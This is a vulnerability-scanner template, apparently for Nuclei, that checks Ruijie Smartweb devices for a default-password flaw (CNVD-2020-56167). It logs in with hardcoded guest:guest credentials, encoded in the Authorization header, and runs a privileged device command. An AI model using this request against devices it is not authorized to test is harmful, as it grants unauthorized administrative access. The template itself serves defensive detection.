id: CNVD-2020-56167

info:
  name: Ruijie Smartweb - Default Password
  author: pikpikcu
  severity: low
  description: Ruijie Smartweb contains a vulnerability via the default password. An attacker can successfully bypass entering required credentials, thus possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
    - https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner
  metadata:
    max-request: 1
  tags: ruijie,default-login,cnvd,cnvd2020

http:
  - method: POST
    path:
      - "{{BaseURL}}/WEB_VMS/LEVEL15/"

    headers:
      Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

    body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Level was: LEVEL15"
          - "/WEB_VMS/LEVEL15/"
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100ffbfb06f31d7e6fe54c37b624991573c67062006f92a636f79f757ce466c09e3022100fbeb7d9dfb087e6b5cef300abb1fbf75996d1a4f9d411f765034754db43ca62e:922c64590222798bb761d5b6d8e72950
